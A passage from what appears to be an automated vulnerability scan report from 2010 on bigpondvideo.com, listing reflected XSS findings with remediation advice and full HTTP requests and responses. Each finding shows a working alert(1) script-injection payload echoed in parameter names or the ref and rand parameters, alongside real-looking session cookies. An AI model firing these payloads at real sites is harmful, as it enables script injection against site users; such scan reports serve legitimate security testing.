<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... /getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3057f014c&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-MusicVODca4fd</script><script>alert(1)</script>361f33e72d3&navId=442&channelTitle=Top Videos&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.477. http://bigpondvideo.com/Trailers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Trailers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd5f6</script><script>alert(1)</script>b222c324373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Trailers/?fd5f6</script><script>alert(1)</script>b222c324373=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:47 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303fc9dbd&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&fd5f6</script><script>alert(1)</script>b222c324373=1&navId=269&channelTitle=Movie Trailers&targetLevel=Videos.Entertainment.Movies.Movie Trailers&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 339a2</script><script>alert(1)</script>132f61ffc7 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Trailers/?ref=Net-Head-TV-Movies-Trailer339a2</script><script>alert(1)</script>132f61ffc7 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:45 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58390
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303d3cb50&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Movies-Trailer339a2</script><script>alert(1)</script>132f61ffc7&navId=269&channelTitle=Movie Trailers&targetLevel=Videos.Entertainment.Movies.Movie Trailers&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.479. http://bigpondvideo.com/Travel/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Travel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c278</script><script>alert(1)</script>666c1837b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Travel/?5c278</script><script>alert(1)</script>666c1837b=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:49 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30414fcb1&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&5c278</script><script>alert(1)</script>666c1837b=1&navId=718&channelTitle=Travel&targetLevel=Videos.Travel.All Destinations&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53ac</script><script>alert(1)</script>adbeb26495e was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Travel/?ref=Net-Head-TV-Movies-Travelc53ac</script><script>alert(1)</script>adbeb26495e HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:08:43 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... lashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb303bb2f52&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Movies-Travelc53ac</script><script>alert(1)</script>adbeb26495e&navId=718&channelTitle=Travel&targetLevel=Videos.Travel.All Destinations&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.481. http://bigpondvideo.com/Web/Flash/carousel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/carousel
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd01</script><script>alert(1)</script>531404fe0b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/carousel?8cd01</script><script>alert(1)</script>531404fe0b3=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:41 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb30764c24e&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&8cd01</script><script>alert(1)</script>531404fe0b3=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e768d</script><script>alert(1)</script>30a0539d897 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/carousel?rand=2e768d</script><script>alert(1)</script>30a0539d897 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:34 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306eab7ce&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2e768d</script><script>alert(1)</script>30a0539d897&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.483. http://bigpondvideo.com/Web/Flash/flash_overlay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/flash_overlay
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a82</script><script>alert(1)</script>3699c1a3250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/flash_overlay?a8a82</script><script>alert(1)</script>3699c1a3250=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:37 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3071e8886&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&a8a82</script><script>alert(1)</script>3699c1a3250=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e497c</script><script>alert(1)</script>0cd06a94310 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/flash_overlay?rand=2e497c</script><script>alert(1)</script>0cd06a94310 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:30 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306a81835&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2e497c</script><script>alert(1)</script>0cd06a94310&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.485. http://bigpondvideo.com/Web/Flash/flash_overlay_all [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/flash_overlay_all
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d3b</script><script>alert(1)</script>3f4a6c9b743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/flash_overlay_all?b9d3b</script><script>alert(1)</script>3f4a6c9b743=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:23 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306348452&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&b9d3b</script><script>alert(1)</script>3f4a6c9b743=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b47c3</script><script>alert(1)</script>de52e3e318d was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/flash_overlay_all?rand=2b47c3</script><script>alert(1)</script>de52e3e318d HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:20 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3060e87ae&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=2b47c3</script><script>alert(1)</script>de52e3e318d&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.487. http://bigpondvideo.com/Web/Flash/headerFl [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/headerFl
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91605</script><script>alert(1)</script>e33c79e55ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/headerFl?91605</script><script>alert(1)</script>e33c79e55ce=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:35 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb307016b80&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&91605</script><script>alert(1)</script>e33c79e55ce=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b077</script><script>alert(1)</script>aec443b76ed was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/headerFl?rand=24b077</script><script>alert(1)</script>aec443b76ed HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:29 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58298
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... .macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb306953bb9&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&rand=24b077</script><script>alert(1)</script>aec443b76ed&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
2.489. http://bigpondvideo.com/Web/Flash/leaveBehind [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondvideo.com
Path:
/Web/Flash/leaveBehind
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9529e</script><script>alert(1)</script>3120f617ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/leaveBehind?9529e</script><script>alert(1)</script>3120f617ea4=1 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
HTTP/1.1 200 OK Date: Tue, 23 Nov 2010 03:09:42 GMT Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5 X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Connection: close Content-Length: 58294
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="X-UA-C ...[SNIP]... ://www.macromedia.com/go/getflashplayer', 'wmode','transparent', 'FlashVars','randFlashId=NV4ceb3076818ce&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&9529e</script><script>alert(1)</script>3120f617ea4=1&contentId=Flash&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code </script> ...[SNIP]...
The value of the rand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55144</script><script>alert(1)</script>0b3d6cfc56 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Web/Flash/leaveBehind?rand=255144</script><script>alert(1)</script>0b3d6cfc56 HTTP/1.1 Host: bigpondvideo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;
Response
